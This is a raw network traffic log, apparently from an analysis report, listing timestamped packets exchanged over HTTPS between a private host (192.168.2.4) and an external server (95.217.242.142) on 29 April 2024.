                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:24.242623091 CEST49767443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:24.242631912 CEST4434976795.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:24.242674112 CEST49767443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:24.255364895 CEST4434976795.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:24.255382061 CEST4434976795.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:24.255425930 CEST49767443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:24.255431890 CEST4434976795.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:24.255465984 CEST49767443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:24.255475044 CEST49767443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:24.261157990 CEST4434976795.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:24.261226892 CEST49767443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:24.261234045 CEST4434976795.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:24.261277914 CEST49767443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:24.486604929 CEST49767443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:24.486634016 CEST4434976795.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:25.145106077 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:25.145148039 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:25.145205975 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:25.145525932 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:25.145539999 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:25.602655888 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:25.602802038 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:25.656033039 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:25.656043053 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:25.656187057 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:25.656191111 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.327224970 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.327253103 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.327270985 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.327316046 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.327356100 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.327367067 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.327423096 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.429023981 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.429049015 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.429117918 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.429140091 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.429153919 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.429182053 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.576217890 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.576237917 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.576334000 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.576364040 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.576411009 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.677167892 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.677186012 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.677308083 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.677325010 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.677371979 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.754695892 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.754713058 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.754805088 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.754828930 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.754873037 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.811784983 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.811800957 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.811897993 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.811928034 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.811979055 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.856626034 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.856642962 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.856745958 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.856759071 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.856807947 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.898334980 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.898349047 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.898441076 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.898453951 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.898502111 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.940845013 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.940859079 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.940933943 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.940958023 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.941001892 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.985541105 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.985558033 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.985616922 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.985626936 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:26.985666990 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.024152994 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.024172068 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.024241924 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.024252892 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.024296045 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.050085068 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.050101042 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.050168037 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.050175905 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.050215960 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.075661898 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.075678110 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.075768948 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.075781107 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.075928926 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.097522974 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.097538948 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.097769976 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.097784042 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.097961903 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.121109009 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.121125937 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.121181011 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.121190071 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.121212006 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.121228933 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.140213013 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.140228987 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.140309095 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.140321970 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.140477896 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.161514044 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.161533117 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.161690950 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.161699057 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.161748886 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.177448034 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.177464962 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.177694082 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.177704096 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.177890062 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.195272923 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.195291042 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.195456028 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.195466995 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.195517063 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.212126970 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.212142944 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.212347984 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.212357998 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.212408066 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.225893021 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.225908995 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.225981951 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.225995064 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.226202965 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.243328094 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.243345976 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.243395090 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.243412971 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.243436098 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.243462086 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.256788969 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.256808043 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.256906033 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.256921053 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.257157087 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.272397995 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.272413969 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.272525072 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.272537947 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.272690058 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.286535025 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.286550999 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.286622047 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.286637068 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.286787033 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.298985958 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.299001932 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.299123049 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.299134016 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.299185038 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.313013077 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.313030958 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.313113928 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.313123941 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.313333988 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.313333988 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.324596882 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.324613094 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.324706078 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.324714899 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.324868917 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.336623907 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.336639881 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.336713076 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.336733103 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.336781979 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.347368956 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.347385883 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.347599030 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.347609043 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.347795963 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.359502077 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.359523058 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.359599113 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.359610081 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.359756947 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.369748116 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.369790077 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.369853020 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.369865894 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.369910955 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.379595041 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.379616022 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.379676104 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.379683971 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.379838943 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.388773918 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.388789892 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.388853073 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.388860941 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.388907909 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.399185896 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.399203062 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.399358988 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.399367094 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.399415970 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.408221960 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.408237934 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.408309937 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.408320904 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.408334017 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.408361912 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.416934013 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.416949034 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.417010069 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.417025089 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.417068005 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.426153898 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.426170111 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.426234007 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.426243067 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.426285028 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.436955929 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.436975956 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.437040091 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.437050104 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.437213898 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.442807913 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.442835093 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.442881107 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.442888021 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.442914009 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.442931890 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.449575901 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.449595928 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.449660063 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.449671984 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.449714899 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.457952976 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.457971096 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.458034992 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.458044052 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.458060980 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.458090067 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.464731932 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.464750051 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.464812994 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.464819908 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.464862108 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.472733021 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.472764969 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.472809076 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.472815990 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.472839117 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.472865105 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.480134010 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.480159998 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.480217934 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.480232000 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.480278969 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.486581087 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.486613989 CEST4434976895.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.486673117 CEST49768443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:27.486680031 CEST4434976895.217.242.142192.168.2.4
